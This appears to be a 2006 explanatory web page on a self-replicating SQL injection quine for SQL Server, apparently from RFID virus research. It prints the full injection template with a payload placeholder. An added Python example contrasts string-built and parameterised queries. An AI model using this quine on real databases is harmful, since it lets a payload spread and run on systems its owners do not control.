
SQL Virus Using Quines for SQL Server


The SQL Server exploit (Exploit 1) is functionally similar to the MySQL version. The differences are explained below.

%content%' WHERE TagId='%id%';
DECLARE @a varchar(1024);
SET @a='UPDATE ContainerContents SET NewContents=''%content%'''' WHERE TagId=''''%id%''''; DECLARE @a varchar(1024); SET @a='''''' + REPLACE(@a, '''''''', '''''''''''') + ''''''; '' + @a; %payload%; --';
UPDATE ContainerContents SET NewContents='%content%'' WHERE TagId=''%id%''; DECLARE @a varchar(1024); SET @a=''' + REPLACE(@a, '''', '''''') + '''; ' + @a; %payload%; --

Exploit 1 - SQL Server exploit. Whitespace is for readability only.

Like MySQL, SQL Server supports variables. However, on SQL Server a variable must be declared before it is used; this happens in the second line. The declaration is repeated in the last line, so that it is copied to the database along with the rest of the payload. Because the variable holds the text of the last line, the declaration is stored in the variable as well.

MySQL uses a backslash to escape quotes in strings (\'). SQL Server uses two single quotes for this purpose.

MySQL provides the functions CONCAT and QUOTE to concatenate strings and to escape the quotes in them.
SQL Server does not provide these functions, so the string concatenation operator + is used to concatenate strings.
Escaping is done with the REPLACE function, which replaces each single quote with two single quotes. This differs slightly from MySQL's QUOTE function, which also encloses the string in quotes. To compensate, the enclosing quotes are added explicitly.
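As an added example (not code from the page or its authors), the following Python emulates the two escaping conventions described above and contrasts the middleware's string-built UPDATE with a parameterised one. SQLite stands in for SQL Server because it uses the same doubled-quote escaping; the table's column types and the sample tag data are assumptions.

```python
import sqlite3

# Constructed stand-in for the table the page's middleware writes to; column
# types are an assumption, only the names come from the page.
SCHEMA = "CREATE TABLE ContainerContents (TagId TEXT PRIMARY KEY, NewContents TEXT)"
UPDATE_SAFE = "UPDATE ContainerContents SET NewContents=? WHERE TagId=?"

def tsql_quote(s: str) -> str:
    """SQL Server idiom from the page, '''' + REPLACE(s, '''', '''''') + '''':
    double every single quote, then wrap the result in quotes."""
    return "'" + s.replace("'", "''") + "'"

def mysql_quote(s: str) -> str:
    """MySQL's QUOTE() for plain strings: backslash-escape, then wrap in quotes."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"

def quote_roundtrip(quoted: str):
    """Parse a quoted literal with SQLite (doubled quotes, like SQL Server); None if rejected."""
    conn = sqlite3.connect(":memory:")
    try:
        return conn.execute("SELECT " + quoted).fetchone()[0]
    except sqlite3.Error:
        return None
    finally:
        conn.close()

def build_update_unsafe(content: str, tag_id: str) -> str:
    """The page's template with %content% and %id% pasted in: a quote in content ends the literal."""
    return f"UPDATE ContainerContents SET NewContents='{content}' WHERE TagId='{tag_id}';"

def demo(content: str = "O'Reilly's crate", tag_id: str = "TAG-0001") -> dict:
    """Write constructed tag data through both paths; report what each stored."""
    results = {}
    for name in ("unsafe", "safe"):
        conn = sqlite3.connect(":memory:")
        conn.execute(SCHEMA)
        conn.execute("INSERT INTO ContainerContents VALUES (?, ?)", (tag_id, "empty"))
        try:
            if name == "unsafe":   # executes whatever the assembled string says
                conn.executescript(build_update_unsafe(content, tag_id))
            else:                  # content travels as a bound value, never as SQL text
                conn.execute(UPDATE_SAFE, (content, tag_id))
            row = conn.execute("SELECT NewContents FROM ContainerContents WHERE TagId=?", (tag_id,)).fetchone()
            results[name] = row[0]
        except sqlite3.Error as exc:
            results[name] = "error: " + type(exc).__name__
        finally:
            conn.close()
    return results
```

With the default sample, the string-built path fails with a syntax error as soon as the tag data contains a quote, while the parameterised path stores the text unchanged; the backslash-escaped MySQL literal is rejected by a doubled-quote dialect, which is the mismatch the text describes.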



Last modified: Thursday, 02 March 2006 21:36, CET